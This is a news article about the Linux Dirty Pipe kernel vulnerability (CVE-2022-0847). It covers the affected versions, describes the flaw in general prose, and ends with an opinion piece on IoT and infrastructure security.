New Linux bug elevated privileges and arbitrary code execution

21-03-2022 | By Robin Mitchell

Linux is a very powerful and popular operating system used extensively in the mobile, IoT, and server world. However, a new vulnerability has been discovered, and it is essential that systems are upgraded to patch the serious flaw that allows for arbitrary code execution.


What does the newly discovered bug allow?


In April 2021, a bug in the Linux kernel was discovered by Max Kellermann, who later published his findings. However, like most discovered bugs, it is only months after its discovery that it is announced to the world, giving security experts time to update systems and introduce fixes. The new bug, called CVE-2022-0847, has now been fixed and is only an issue for systems using Linux kernel versions between 5.8 and has now been fixed in 5.16.11, 5.15.25, and 5.10102.

The discovered bug takes advantage of the operating systems’ poor handling of pipes and page caching, which eventually allows an attacker who does not have administrative privileges to inject arbitrary code into privileged processes.

Without going into too much detail (which can be found here), the new bug results from the Linux Kernel not correctly initialising values for flags used when using pipes that work with page caches. A rouge program can create a pipe, fill the pipe with arbitrary data (which sets a specific system flag), drain the pipe (this step doesn’t reset the previous flag), open a read-only file, and then write arbitrary data into the pipe.

When draining the pipe, the Linux system is supposed to clear flags for that pipe, but the newer versions of Linux do not do this, which leads to flags containing stale values. This means that a writing pipe can be used to write into read-only page cache files that are marked as read-only.


What devices are vulnerable?


It is hard to determine how many devices are vulnerable to this bug, but devices using Linux 5.8 and over are vulnerable unless they are updated to one of the three versions previously mentioned. Considering that IoT devices use the Linux OS en masse, there may be millions of devices worldwide that are currently vulnerable. This is worsened by the fact that IoT devices can often be challenging to update depending on the environment they are installed in and if the owners of the devices are aware that updates are required.

Of course, this vulnerability doesn’t affect older Linux versions prior to 5.8, but then the disadvantage of older versions of the kernel is that they may be vulnerable to many other bugs that have since been fixed in 5.8 and above. The fact that Linux 5.8 is a relatively new version (since August 2020), it will only be Linux devices made since then that will be vulnerable to the bug assuming that a device cannot auto-update without user intervention.


Does this bug support the concept of customised operating systems in IoT devices?


This is not the first time Linux, and software systems that depend on it, has seen security flaws that leave many millions of devices at risk. This newly discovered bug doesn’t demonstrate that Linux is a flawed system that should be avoided as all operating systems (especially including Windows) contain vulnerabilities. If anything, the speed and secrecy with which this bug was dealt with can show the advantages of open-source software systems.

However, this bug does provide evidence against the use of publicly available software solutions in IoT devices and those handling critical infrastructure. IoT devices found in the home will often be used to control doors, windows, and air conditioning which, if hacked, could allow attackers access to individual personal data and control of a home. This is intrusive and potentially damaging, but a criminal having access to infrastructure that controls power stations and water lines could bring mayhem to millions.

As such, devices used in infrastructure and national defence should consider using platforms designed from scratch with only the absolute necessary services running. It may be easier to design a power grid controller using Linux, but in terms of security, it would be arguably safer to use a DIY closed-source system that the public does not have access to.

Of course, the use of DIY systems introduces security flaws that can be introduced through incompetent programming (remember that Linux is community development with thousands of Linux legends), and information on the closed-source solution could be leaked accidentally. Thus, a vulnerability can be discovered in a closed-source system known by a few hackers, which can be exploited in the future at any time with no warning.


Profile.jpg

By Robin Mitchell

Robin Mitchell is an electronic engineer who has been involved in electronics since the age of 13. After completing a BEng at the University of Warwick, Robin moved into the field of online content creation, developing articles, news pieces, and projects aimed at professionals and makers alike. Currently, Robin runs a small electronics business, MitchElectronics, which produces educational kits and resources.